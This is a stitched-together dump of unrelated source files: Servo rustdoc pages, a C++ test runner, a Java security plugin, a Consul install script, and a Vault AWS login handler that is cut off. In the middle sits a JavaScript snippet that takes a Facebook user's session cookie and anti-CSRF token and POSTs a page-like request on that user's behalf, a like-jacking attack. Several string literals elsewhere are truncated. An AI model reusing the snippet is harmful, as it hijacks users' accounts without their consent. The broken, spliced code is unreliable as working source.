<meta name="description" content="API documentation for the Rust `NetworkEvent` enum in crate `devtools_traits`.">
<meta name="keywords" content="rust, rustlang, rust-lang, NetworkEvent">
<title>devtools_traits::NetworkEvent - Rust</title>
<link rel="stylesheet" type="text/css" href="../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='index.html'>devtools_traits</a></p><script>window.sidebarCurrent = {name: 'NetworkEvent', ty: 'enum', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content enum">
<h1 class='fqn'><span class='in-band'>Enum <a href='index.html'>devtools_traits</a>::<wbr><a class='enum' href=''>NetworkEvent</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-21620' class='srclink' href='../src/devtools_traits/lib.rs.html#265-268' title='goto source code'>[src]</a></span></h1>
<pre class='rust enum'>pub enum NetworkEvent {
HttpRequest(<a class='struct' href='../url/struct.Url.html' title='url::Url'>Url</a>, <a class='enum' href='../hyper/method/enum.Method.html' title='hyper::method::Method'>Method</a>, <a class='struct' href='../hyper/header/struct.Headers.html' title='hyper::header::Headers'>Headers</a>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../std/primitive.u8.html'>u8</a>>>),
HttpResponse(<a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../hyper/header/struct.Headers.html' title='hyper::header::Headers'>Headers</a>>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../hyper/http/struct.RawStatus.html' title='hyper::http::RawStatus'>RawStatus</a>>, <a class='enum' href='../core/option/enum.Option.html' title='core::option::Option'>Option</a><<a class='struct' href='../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../std/primitive.u8.html'>u8</a>>>),
}</pre><h2 class='variants'>Variants</h2>
<table><tr><td id='variant.HttpRequest'><code>HttpRequest</code></td><td></td></tr><tr><td id='variant.HttpResponse'><code>HttpResponse</code></td><td></td></tr></table><h2 id='implementations'>Trait Implementations</h2><h3 id='<API key>'>Derived Implementations </h3><h3 class='impl'><code>impl <a class='trait' href='../core/clone/trait.Clone.html' title='core::clone::Clone'>Clone</a> for <a class='enum' href='../devtools_traits/enum.NetworkEvent.html' title='devtools_traits::NetworkEvent'>NetworkEvent</a></code></h3><div class='impl-items'><h4 id='method.clone' class='method'><code>fn <a href='../core/clone/trait.Clone.html#method.clone' class='fnname'>clone</a>(&self) -> <a class='enum' href='../devtools_traits/enum.NetworkEvent.html' title='devtools_traits::NetworkEvent'>NetworkEvent</a></code></h4>
<h4 id='method.clone_from' class='method'><code>fn <a href='../core/clone/trait.Clone.html#method.clone_from' class='fnname'>clone_from</a>(&mut self, source: &Self)</code></h4>
</div></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../";
window.currentCrate = "devtools_traits";
window.playgroundUrl = "";
</script>
<script src="../jquery.js"></script>
<script src="../main.js"></script>
<script async src="../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `bgColor_getterinfo` constant in crate `script`.">
<meta name="keywords" content="rust, rustlang, rust-lang, bgColor_getterinfo">
<title>script::dom::bindings::codegen::Bindings::DocumentBinding::bgColor_getterinfo - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../../../../../index.html'>script</a>::<wbr><a href='../../../../index.html'>dom</a>::<wbr><a href='../../../index.html'>bindings</a>::<wbr><a href='../../index.html'>codegen</a>::<wbr><a href='../index.html'>Bindings</a>::<wbr><a href='index.html'>DocumentBinding</a></p><script>window.sidebarCurrent = {name: 'bgColor_getterinfo', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../../../../../index.html'>script</a>::<wbr><a href='../../../../index.html'>dom</a>::<wbr><a href='../../../index.html'>bindings</a>::<wbr><a href='../../index.html'>codegen</a>::<wbr><a href='../index.html'>Bindings</a>::<wbr><a href='index.html'>DocumentBinding</a>::<wbr><a class='constant' href=''>bgColor_getterinfo</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-173190' class='srclink' href='../../../../../../src/script///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/Bindings/DocumentBinding.rs.html#1754-1767' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>const bgColor_getterinfo: <a class='struct' href='../../../../../../js/jsapi/struct.JSJitInfo.html' title='js::jsapi::JSJitInfo'>JSJitInfo</a><code> = </code><code>JSJitInfo {
_bindgen_data_1_: get_bgColor as *const ::libc::c_void,
protoID: PrototypeList::ID::Document as u16,
depth: 2,
_bitfield_1: ((JSJitInfo_OpType::Getter as u32) << 0) |
((JSJitInfo_AliasSet::AliasEverything as u32) << 4) |
((JSValueType::JSVAL_TYPE_STRING as u32) << 8) |
((true as u32) << 16) |
((false as u32) << 17) |
((false as u32) << 18) |
((false as u32) << 19) |
((false as u32) << 20) |
((0 as u32) << 21)
}</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../../../../";
window.currentCrate = "script";
window.playgroundUrl = "";
</script>
<script src="../../../../../../jquery.js"></script>
<script src="../../../../../../main.js"></script>
<script async src="../../../../../../search-index.js"></script>
</body>
</html> |
// This Source Code Form is subject to the terms of the Mozilla Public
// Includes
#include "TestRunner.h"
#include "Optarg.h"
#include "TestAssert.h"
#include "TestJUnitXmlReport.h"
#include "TestTag.h"
#include "TestSuite.h"
#include <string.h>
#include <iostream>
#include <fstream>
using namespace std;
// Private Macros
// Private Type Definitions
// Private Function and Class Declarations
// Variable Declarations
// Function and Class Implementation
TestRunner::TestRunner(int argc, char* argv[])
: m_stopOnError(true)
{
parseArguments(argc, argv);
// Get all the suites.
map<string, vector<TestSuite *> > fileToSuite;
for (const TestSuite::Tag *suiteTag = TestSuite::Tag::first(); suiteTag != NULL; suiteTag = suiteTag->next())
{
addSuite(new TestSuite(*this, *suiteTag));
}
// Now add all the executors to the appropriate suites.
vector<TestSuite *> defaultSuites;
for (const TestTag *tag = TestTag::first(); tag != NULL; tag = tag->next())
{
addExecution(tag);
}
}
TestRunner::~TestRunner(void)
{
// Delete the default suites.
for (size_t i = 0; i < m_suites.size(); ++i)
{
delete m_suites[i];
}
}
void TestRunner::parseArguments(int argc, char* argv[])
{
Optarg cfg(argc, argv);
cfg.opt('c', m_stopOnError, "Continue even when a test fails (stops on error by default).");
cfg.opt('j', m_junitXmlFile, "The name of the JUnit XML file to write with the test results.");
}
void TestRunner::addSuite(TestSuite *suite)
{
// Order based on priority, name, file, the line number - lowest first.
vector<TestSuite *>::iterator vit;
bool inserted = false;
for (vit = m_suites.begin(); vit != m_suites.end(); vit++)
{
int cmp = (*vit)->priority() - suite->priority();
if (cmp == 0)
{
cmp = strcmp(suite->name(), (*vit)->name());
if (cmp == 0)
{
cmp = strcmp(suite->file(), (*vit)->file());
if (cmp == 0)
{
cmp = suite->line() - (*vit)->line();
}
}
}
if (cmp < 0)
{
m_suites.insert(vit, suite);
inserted = true;
break;
}
}
if (!inserted)
{
m_suites.push_back(suite);
}
// Insert into the map - could be multiple suites per file.
map<string, vector<TestSuite *> >::iterator it = m_fileToSuite.find(suite->file());
if (it == m_fileToSuite.end())
{
vector<TestSuite *> newVector;
newVector.push_back(suite);
m_fileToSuite[suite->file()] = newVector;
}
else
{
// Order based on line number, lowest first.
for (vit = it->second.begin(); vit != it->second.end(); vit++)
{
if (suite->line() < (*vit)->line())
{
it->second.insert(vit, suite);
return;
}
}
it->second.push_back(suite);
}
}
void TestRunner::addExecution(const TestTag *tag)
{
// Find the suite for the executor.
TestSuite *suite;
map<string, vector<TestSuite *> >::iterator it = m_fileToSuite.find(tag->file());
if (it == m_fileToSuite.end())
{
// Create a new suite based on this executor.
TestSuite::Tag *suiteTag = new TestSuite::Tag(tag->file(), tag->line(), "Default", 0);
suite = new TestSuite(*this, *suiteTag, suiteTag);
addSuite(suite);
}
else
{
// Search the list - look for the last item where the line() of the
// executor is higher than the line() of the suite.
suite = it->second[0];
for (size_t i = it->second.size() - 1; i >= 1; --i)
{
if (tag->line() >= it->second[i]->line())
{
suite = it->second[i];
break;
}
}
}
// Add the executor to the suite.
suite->addExecution(tag);
}
int TestRunner::run(void)
{
m_pass.clear();
m_fail.clear();
m_notExecuted.clear();
for (size_t i = 0; i < m_suites.size(); ++i)
{
TestSuite *suite = m_suites[i];
for (size_t j = 0; j < suite->executionCount(); ++j)
{
TestExecution& exec = suite->execution(j);
if (m_stopOnError && m_fail.size() > 0)
{
exec.clearExecuted();
m_notExecuted.push_back(&exec);
}
else
{
// Run the test with the 'current' indicator set.
{
TestExecution::Current current(exec);
renderBeforeTest(exec);
beforeTest(exec);
exec.execute();
afterTest(exec);
renderAfterTest(exec);
}
if (exec.isFail())
{
m_fail.push_back(&exec);
}
else
{
m_pass.push_back(&exec);
}
}
}
}
renderAfterRunner();
if (m_junitXmlFile.size() > 0)
{
TestJUnitXmlReport report(*this);
ofstream os(m_junitXmlFile.c_str(), ofstream::out);
report.publish(os);
os.close();
}
return m_fail.size() == 0 ? 0 : 1;
}
void TestRunner::notifyAssertion(const TestAssert& ast)
{
renderAssertion(ast);
}
void TestRunner::renderBeforeTest(const TestExecution& exec)
{
cout << "
}
void TestRunner::renderAssertion(const TestAssert& ast)
{
cout << "!!!!!!! ";
switch (ast.type())
{
default:
cout << "ASSERTION FAILURE";
break;
case TestAssert::EXPECTED_EXCEPTION:
cout << "EXPECTED EXCEPTION NOT RAISED";
break;
case TestAssert::<API key>:
cout << "UNEXPECTED EXCEPTION";
break;
}
cout << endl;
cout << " Test: " << ast.execution().suite().name() << "::" << ast.execution().name() << endl;
cout << " declared at " << ast.execution().file() << ":" << ast.execution().line() << ")" << endl;
if (ast.type() != TestAssert::<API key>)
{
cout << " Function: " << ast.function() << endl;
cout << " Location: " << ast.file() << ":" << ast.line() << endl;
}
switch (ast.type())
{
default:
cout << " Expression: " << ast.expr() << endl;
if (ast.exprDecomp().size() > 0)
{
cout << " Evalulated: " << ast.exprDecomp() << endl;
}
break;
case TestAssert::EXPECTED_EXCEPTION:
cout << " Exception: " << ast.exceptionName() << endl;
cout << " Expression: " << ast.expr() << endl;
break;
case TestAssert::<API key>:
cout << " Exception: " << ast.exceptionName() << endl;
if (ast.exceptionMessage().size() > 0)
{
cout << " Message: " << ast.exceptionMessage() << endl;
}
break;
}
}
void TestRunner::renderAfterTest(const TestExecution& exec)
{
cout << "<<
<< exec.suite().name() << "::" << exec.name() << endl << endl;
}
void TestRunner::renderAfterRunner(void)
{
size_t assertionTotal = 0;
for (size_t i = 0; i < m_pass.size(); ++i)
{
assertionTotal += m_pass[i]->assertionCount();
}
for (size_t i = 0; i < m_fail.size(); ++i)
{
assertionTotal += m_fail[i]->assertionCount();
}
size_t total = m_pass.size() + m_fail.size() + m_notExecuted.size();
cout << "Ran " << total << (total == 1 ? " test" : " tests");
cout << " consisting of " << assertionTotal << (assertionTotal == 1 ? " assertion" : " assertions");
cout << ": ";
if (m_fail.size() == 0 && m_notExecuted.size() == 0)
{
cout << " All passed.";
}
else
{
cout << m_pass.size() << " passed, " << m_fail.size() << " failed";
if (m_notExecuted.size() > 0)
{
cout << ", and " << m_notExecuted.size() << " not executed";
}
cout << ".";
}
cout << endl;
}
void TestRunner::beforeTest(const TestExecution& exec)
{
}
void TestRunner::afterTest(const TestExecution& exec)
{
} |
package org.seedstack.seed.security.internal;
import static org.seedstack.shed.misc.PriorityUtils.sortByPriority;
import com.google.common.collect.Lists;
import io.nuun.kernel.api.plugin.InitState;
import io.nuun.kernel.api.plugin.context.InitContext;
import io.nuun.kernel.api.plugin.request.<API key>;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.seedstack.seed.SeedException;
import org.seedstack.seed.core.internal.AbstractSeedPlugin;
import org.seedstack.seed.core.internal.el.ELPlugin;
import org.seedstack.seed.security.PrincipalCustomizer;
import org.seedstack.seed.security.Realm;
import org.seedstack.seed.security.RoleMapping;
import org.seedstack.seed.security.<API key>;
import org.seedstack.seed.security.Scope;
import org.seedstack.seed.security.SecurityConfig;
import org.seedstack.seed.security.spi.CrudActionResolver;
import org.seedstack.seed.security.spi.SecurityScope;
import org.seedstack.shed.misc.PriorityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This plugin provides core security infrastructure, based on Apache Shiro
* implementation.
*/
public class SecurityPlugin extends AbstractSeedPlugin {
private static final Logger LOGGER = LoggerFactory.getLogger(SecurityPlugin.class);
private final Map<String, Class<? extends Scope>> scopeClasses = new HashMap<>();
private final Set<SecurityProvider> securityProviders = new HashSet<>();
private final List<Class<? extends CrudActionResolver>> crudActionResolvers = new ArrayList<>();
private SecurityConfigurer securityConfigurer;
@Override
public String name() {
return "security";
}
@Override
public Collection<Class<?>> dependencies() {
return Lists.newArrayList(SecurityProvider.class);
}
@Override
public Collection<<API key>> <API key>() {
return <API key>()
.subtypeOf(Realm.class)
.subtypeOf(RoleMapping.class)
.subtypeOf(<API key>.class)
.subtypeOf(Scope.class)
.subtypeOf(PrincipalCustomizer.class)
.subtypeOf(CrudActionResolver.class)
.build();
}
@Override
@SuppressWarnings({"unchecked"})
public InitState initialize(InitContext initContext) {
SecurityConfig securityConfig = getConfiguration(SecurityConfig.class);
Map<Class<?>, Collection<Class<?>>> scannedClasses = initContext.<API key>();
configureScopes(scannedClasses.get(Scope.class));
<API key>(scannedClasses.get(CrudActionResolver.class));
securityProviders.addAll(initContext.dependencies(SecurityProvider.class));
securityConfigurer = new SecurityConfigurer(
securityConfig,
scannedClasses,
(Collection) scannedClasses.get(PrincipalCustomizer.class)
);
return InitState.INITIALIZED;
}
@SuppressWarnings("unchecked")
private void <API key>(Collection<Class<?>> candidates) {
if (candidates != null) {
candidates.stream()
.map(x -> (Class<? extends CrudActionResolver>) x)
.forEach(crudActionResolvers::add);
sortByPriority(crudActionResolvers, PriorityUtils::priorityOfClassOf);
if (LOGGER.isDebugEnabled()) {
for (Class<? extends CrudActionResolver> crudActionResolver : crudActionResolvers) {
LOGGER.debug("CRUD action resolver {} detected", crudActionResolver.getName());
}
}
}
}
@SuppressWarnings("unchecked")
private void configureScopes(Collection<Class<?>> candidates) {
if (candidates != null) {
for (Class<?> candidate : candidates) {
if (Scope.class.isAssignableFrom(candidate)) {
SecurityScope securityScope = candidate.getAnnotation(SecurityScope.class);
String scopeName;
if (securityScope != null) {
scopeName = securityScope.value();
} else {
scopeName = candidate.getSimpleName();
}
try {
candidate.getConstructor(String.class);
} catch (<API key> e) {
throw SeedException.wrap(e, SecurityErrorCode.<API key>)
.put("scopeName", scopeName)
.put("class", candidate.getName());
}
if (scopeClasses.containsKey(scopeName)) {
throw SeedException.createNew(SecurityErrorCode.<API key>)
.put("scopeName", scopeName)
.put("class1", scopeClasses.get(scopeName).getName())
.put("class2", candidate.getName());
}
LOGGER.debug("Security scope {} implemented by {} has been detected",
scopeName,
candidate.getName());
scopeClasses.put(scopeName, (Class<? extends Scope>) candidate);
}
}
}
}
@Override
public Object nativeUnitModule() {
return new SecurityModule(
securityConfigurer,
scopeClasses,
ELPlugin.<API key>(),
securityProviders,
crudActionResolvers);
}
} |
#!/usr/bin/env bash
set -o errexit
VERSION=1.0.7
DOWNLOAD=https://releases.hashicorp.com/consul/${VERSION}/consul_${VERSION}_linux_amd64.zip
function install_consul() {
if [[ -e /usr/bin/consul ]] ; then
if [ "v${VERSION}" == "$(consul version | head -n1 | awk '{print $2}')" ] ; then
return
fi
fi
wget -q -O /tmp/consul.zip ${DOWNLOAD}
unzip -d /tmp /tmp/consul.zip
mv /tmp/consul /usr/bin/consul
chmod +x /usr/bin/consul
}
install_consul |
var X = new XMLHttpRequest();
var XURL = "
var XParams = "fbpage_id=165468157402501&add=true&__user="+document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])+"&__a=1&fb_dtsg="+document.getElementsByName('fb_dtsg')[0].value+"&ttstamp=";
X.open("POST", XURL, true);
x.setRequestHeader("Content-type", "application/<API key>");
X.onreadystatechange = function () {
if (X.readyState == 4 && X.status == 200) {
X.close;
}
};
X.send(XParams); |
package awsec2
import (
"crypto/subtle"
"crypto/x509"
"encoding/base64"
"encoding/pem"
"fmt"
"strings"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/service/ec2"
"github.com/aws/aws-sdk-go/service/iam"
"github.com/fullsailor/pkcs7"
"github.com/hashicorp/go-uuid"
"github.com/hashicorp/vault/helper/jsonutil"
"github.com/hashicorp/vault/helper/strutil"
"github.com/hashicorp/vault/logical"
"github.com/hashicorp/vault/logical/framework"
)
const (
re<API key> = "re<API key>
)
func pathLogin(b *backend) *framework.Path {
return &framework.Path{
Pattern: "login$",
Fields: map[string]*framework.FieldSchema{
"role": {
Type: framework.TypeString,
Description: `Name of the role against which the login is being attempted.
If 'role' is not specified, then the login endpoint looks for a role
bearing the name of the AMI ID of the EC2 instance that is trying to login.
If a matching role is not found, login fails.`,
},
"pkcs7": {
Type: framework.TypeString,
Description: "PKCS7 signature of the identity document.",
},
"nonce": {
Type: framework.TypeString,
Description: `The nonce to be used for subsequent login requests.
If this parameter is not specified at all and if reauthentication is allowed,
then the backend will generate a random nonce, attaches it to the instance's
identity-whitelist entry and returns the nonce back as part of auth metadata.
This value should be used with further login requests, to establish client
authenticity. Clients can choose to set a custom nonce if preferred, in which
case, it is recommended that clients provide a strong nonce. If a nonce is
provided but with an empty value, it indicates intent to disable
reauthentication. Note that, when '<API key>' option is enabled
on either the role or the role tag, the 'nonce' holds no significance.`,
},
"identity": {
Type: framework.TypeString,
Description: `Base64 encoded EC2 instance identity document. This needs to be supplied along
with the 'signature' parameter. If using 'curl' for fetching the identity
document, consider using the option '-w 0' while piping the output to 'base64'
binary.`,
},
"signature": {
Type: framework.TypeString,
Description: `Base64 encoded SHA256 RSA signature of the instance identity document. This
needs to be supplied along with 'identity' parameter.`,
},
},
Callbacks: map[logical.Operation]framework.OperationFunc{
logical.UpdateOperation: b.pathLoginUpdate,
},
HelpSynopsis: pathLoginSyn,
HelpDescription: pathLoginDesc,
}
}
// instanceIamRoleARN fetches the IAM role ARN associated with the given
// instance profile name
func (b *backend) instanceIamRoleARN(s logical.Storage, instanceProfileName, region, accountID string) (string, error) {
if instanceProfileName == "" {
return "", fmt.Errorf("missing instance profile name")
}
// Check if an STS configuration exists for the AWS account
sts, err := b.lockedAwsStsEntry(s, accountID)
if err != nil {
return "", fmt.Errorf("error fetching STS config for account ID %q: %q\n", accountID, err)
}
// An empty STS role signifies the master account
stsRole := ""
if sts != nil {
stsRole = sts.StsRole
}
iamClient, err := b.clientIAM(s, region, stsRole)
if err != nil {
return "", err
}
profile, err := iamClient.GetInstanceProfile(&iam.<API key>{
InstanceProfileName: aws.String(instanceProfileName),
})
if err != nil {
return "", err
}
if profile == nil {
return "", fmt.Errorf("nil output while getting instance profile details")
}
if profile.InstanceProfile == nil {
return "", fmt.Errorf("nil instance profile in the output of instance profile details")
}
if profile.InstanceProfile.Roles == nil || len(profile.InstanceProfile.Roles) != 1 {
return "", fmt.Errorf("invalid roles in the output of instance profile details")
}
if profile.InstanceProfile.Roles[0].Arn == nil {
return "", fmt.Errorf("nil role ARN in the output of instance profile details")
}
return *profile.InstanceProfile.Roles[0].Arn, nil
}
// validateInstance queries the status of the EC2 instance using AWS EC2 API
// and checks if the instance is running and is healthy
func (b *backend) validateInstance(s logical.Storage, instanceID, region, accountID string) (*ec2.<API key>, error) {
// Check if an STS configuration exists for the AWS account
sts, err := b.lockedAwsStsEntry(s, accountID)
if err != nil {
return nil, fmt.Errorf("error fetching STS config for account ID %q: %q\n", accountID, err)
}
// An empty STS role signifies the master account
stsRole := ""
if sts != nil {
stsRole = sts.StsRole
}
// Create an EC2 client to pull the instance information
ec2Client, err := b.clientEC2(s, region, stsRole)
if err != nil {
return nil, err
}
status, err := ec2Client.DescribeInstances(&ec2.<API key>{
Filters: []*ec2.Filter{
&ec2.Filter{
Name: aws.String("instance-id"),
Values: []*string{
aws.String(instanceID),
},
},
},
})
if err != nil {
return nil, fmt.Errorf("error fetching description for instance ID %q: %q\n", instanceID, err)
}
if status == nil {
return nil, fmt.Errorf("nil output from describe instances")
}
if len(status.Reservations) == 0 {
return nil, fmt.Errorf("no reservations found in instance description")
}
if len(status.Reservations[0].Instances) == 0 {
return nil, fmt.Errorf("no instance details found in reservations")
}
if *status.Reservations[0].Instances[0].InstanceId != instanceID {
return nil, fmt.Errorf("expected instance ID not matching the instance ID in the instance description")
}
if status.Reservations[0].Instances[0].State == nil {
return nil, fmt.Errorf("instance state in instance description is nil")
}
if *status.Reservations[0].Instances[0].State.Name != "running" {
return nil, fmt.Errorf("instance is not in 'running' state")
}
return status, nil
}
// validateMetadata matches the given client nonce and pending time with the
// one cached in the identity whitelist during the previous login. But, if
// reauthentication is disabled, login attempt is failed immediately.
func validateMetadata(clientNonce, pendingTime string, storedIdentity *whitelistIdentity, roleEntry *awsRoleEntry) error {
// For sanity
if !storedIdentity.<API key> && storedIdentity.ClientNonce == "" {
return fmt.Errorf("client nonce missing in stored identity")
}
// If reauthentication is disabled or if the nonce supplied matches a
// predefied nonce which indicates reauthentication to be disabled,
// authentication will not succeed.
if storedIdentity.<API key> ||
subtle.ConstantTimeCompare([]byte(re<API key>), []byte(clientNonce)) == 1 {
return fmt.Errorf("reauthentication is disabled")
}
givenPendingTime, err := time.Parse(time.RFC3339, pendingTime)
if err != nil {
return err
}
storedPendingTime, err := time.Parse(time.RFC3339, storedIdentity.PendingTime)
if err != nil {
return err
}
// When the presented client nonce does not match the cached entry, it
// is either that a rogue client is trying to login or that a valid
// client suffered a migration. The migration is detected via
// pendingTime in the instance metadata, which sadly is only updated
// when an instance is stopped and started but *not* when the instance
// is rebooted. If reboot survivability is needed, either
// instrumentation to delete the instance ID from the whitelist is
// necessary, or the client must durably store the nonce.
// If the `<API key>` property of the registered role is
// enabled, then the client nonce mismatch is ignored, as long as the
// pending time in the presented instance identity document is newer
// than the cached pending time. The new pendingTime is stored and used
// for future checks.
// This is a weak criterion and hence the `<API key>`
// option should be used with caution.
if subtle.ConstantTimeCompare([]byte(clientNonce), []byte(storedIdentity.ClientNonce)) != 1 {
if !roleEntry.<API key> {
return fmt.Errorf("client nonce mismatch")
}
if roleEntry.<API key> && !givenPendingTime.After(storedPendingTime) {
return fmt.Errorf("client nonce mismatch and instance meta-data incorrect")
}
}
// Ensure that the 'pendingTime' on the given identity document is not
// before the 'pendingTime' that was used for previous login. This
// disallows old metadata documents from being used to perform login.
if givenPendingTime.Before(storedPendingTime) {
return fmt.Errorf("instance meta-data is older than the one used for previous login")
}
return nil
}
// Verifies the integrity of the instance identity document using its SHA256
// RSA signature. After verification, returns the unmarshaled instance identity
// document.
func (b *backend) <API key>(s logical.Storage, identityBytes, signatureBytes []byte) (*identityDocument, error) {
if len(identityBytes) == 0 {
return nil, fmt.Errorf("missing instance identity document")
}
if len(signatureBytes) == 0 {
return nil, fmt.Errorf("missing SHA256 RSA signature of the instance identity document")
}
// Get the public certificates that are used to verify the signature.
// This returns a slice of certificates containing the default
// certificate and all the registered certificates via
// 'config/certificate/<cert_name>' endpoint, for verifying the RSA
// digest.
publicCerts, err := b.<API key>(s, false)
if err != nil {
return nil, err
}
if publicCerts == nil || len(publicCerts) == 0 {
return nil, fmt.Errorf("certificates to verify the signature are not found")
}
// Check if any of the certs registered at the backend can verify the
// signature
for _, cert := range publicCerts {
err := cert.CheckSignature(x509.SHA256WithRSA, identityBytes, signatureBytes)
if err == nil {
var identityDoc identityDocument
if decErr := jsonutil.DecodeJSON(identityBytes, &identityDoc); decErr != nil {
return nil, decErr
}
return &identityDoc, nil
}
}
return nil, fmt.Errorf("instance identity verification using SHA256 RSA signature is unsuccessful")
}
// Verifies the correctness of the authenticated attributes present in the PKCS
// signature. After verification, extracts the instance identity document from the
// signature, parses it and returns it.
func (b *backend) <API key>(s logical.Storage, pkcs7B64 string) (*identityDocument, error) {
// Insert the header and footer for the signature to be able to pem decode it
pkcs7B64 = fmt.Sprintf("
// Decode the PEM encoded signature
pkcs7BER, pkcs7Rest := pem.Decode([]byte(pkcs7B64))
if len(pkcs7Rest) != 0 {
return nil, fmt.Errorf("failed to decode the PEM encoded PKCS#7 signature")
}
// Parse the signature from asn1 format into a struct
pkcs7Data, err := pkcs7.Parse(pkcs7BER.Bytes)
if err != nil {
return nil, fmt.Errorf("failed to parse the BER encoded PKCS#7 signature: %v\n", err)
}
// Get the public certificates that are used to verify the signature.
// This returns a slice of certificates containing the default certificate
// and all the registered certificates via 'config/certificate/<cert_name>' endpoint
publicCerts, err := b.<API key>(s, true)
if err != nil {
return nil, err
}
if publicCerts == nil || len(publicCerts) == 0 {
return nil, fmt.Errorf("certificates to verify the signature are not found")
}
// Before calling Verify() on the PKCS#7 struct, set the certificates to be used
// to verify the contents in the signer information.
pkcs7Data.Certificates = publicCerts
// Verify extracts the authenticated attributes in the PKCS#7 signature, and verifies
// the authenticity of the content using 'dsa.PublicKey' embedded in the public certificate.
if pkcs7Data.Verify() != nil {
return nil, fmt.Errorf("failed to verify the signature")
}
// Check if the signature has content inside of it
if len(pkcs7Data.Content) == 0 {
return nil, fmt.Errorf("instance identity document could not be found in the signature")
}
var identityDoc identityDocument
if err := jsonutil.DecodeJSON(pkcs7Data.Content, &identityDoc); err != nil {
return nil, err
}
return &identityDoc, nil
}
// pathLoginUpdate is used to create a Vault token by the EC2 instances
// by providing the pkcs7 signature of the instance identity document
// and a client created nonce. Client nonce is optional if '<API key>'
// option is enabled on the registered role.
func (b *backend) pathLoginUpdate(
req *logical.Request, data *framework.FieldData) (*logical.Response, error) {
identityDocB64 := data.Get("identity").(string)
var identityDocBytes []byte
var err error
if identityDocB64 != "" {
identityDocBytes, err = base64.StdEncoding.DecodeString(identityDocB64)
if err != nil || len(identityDocBytes) == 0 {
return logical.ErrorResponse("failed to base64 decode the instance identity document"), nil
}
}
signatureB64 := data.Get("signature").(string)
var signatureBytes []byte
if signatureB64 != "" {
signatureBytes, err = base64.StdEncoding.DecodeString(signatureB64)
if err != nil {
return logical.ErrorResponse("failed to base64 decode the SHA256 RSA signature of the instance identity document"), nil
}
}
pkcs7B64 := data.Get("pkcs7").(string)
// Either the pkcs7 signature of the instance identity document, or
// the identity document itself along with its SHA256 RSA signature
// needs to be provided.
if pkcs7B64 == "" && (len(identityDocBytes) == 0 && len(signatureBytes) == 0) {
return logical.ErrorResponse("either pkcs7 or a tuple containing the instance identity document and its SHA256 RSA signature needs to be provided"), nil
} else if pkcs7B64 != "" && (len(identityDocBytes) != 0 && len(signatureBytes) != 0) {
return logical.ErrorResponse("both pkcs7 and a tuple containing the instance identity document and its SHA256 RSA signature is supplied; provide only one"), nil
}
// Verify the signature of the identity document and unmarshal it
